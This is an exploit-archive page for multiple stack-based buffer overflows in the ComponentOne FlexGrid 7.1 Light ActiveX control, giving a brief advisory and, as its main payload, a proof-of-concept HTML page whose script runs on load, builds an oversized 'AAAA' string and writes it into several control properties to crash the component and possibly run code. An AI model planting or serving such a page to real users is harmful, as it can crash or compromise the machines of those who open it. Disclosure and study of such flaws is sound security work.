header-logo
Suggest Exploit
vendor:
FlexGrid ActiveX Control
by:
7.5
CVSS
HIGH
Stack-Based Buffer Overflow
CWE
Product Name: FlexGrid ActiveX Control
Affected Version From: ComponentOne FlexGrid 7.1 Light
Affected Version To: Other versions may also be affected
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows

ComponentOne FlexGrid ActiveX Control Multiple Stack-Based Buffer Overflow Vulnerabilities

The ComponentOne FlexGrid ActiveX Control is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to adequately check boundaries on user-supplied input. An attacker can exploit these issues to cause denial denial-of-service conditions and possibly to execute arbitrary code, but this has not been confirmed.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26467/info

ComponentOne FlexGrid ActiveX Control is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to adequately check boundaries on user-supplied input.

An attacker can exploit these issues to cause denial denial-of-service conditions and possibly to execute arbitrary code, but this has not been confirmed.

ComponentOne FlexGrid 7.1 Light is vulnerable; other versions may also be affected. 

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";

     while (s.length < 262145) s=s+s;

     var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");

     obj.Text = s;
     obj.EditSelText = s;
     obj.EditText = s;
     obj.CellFontName = s;
   }
  </script>

 </head>
 <body onload="JavaScript: return Check();" />
</html>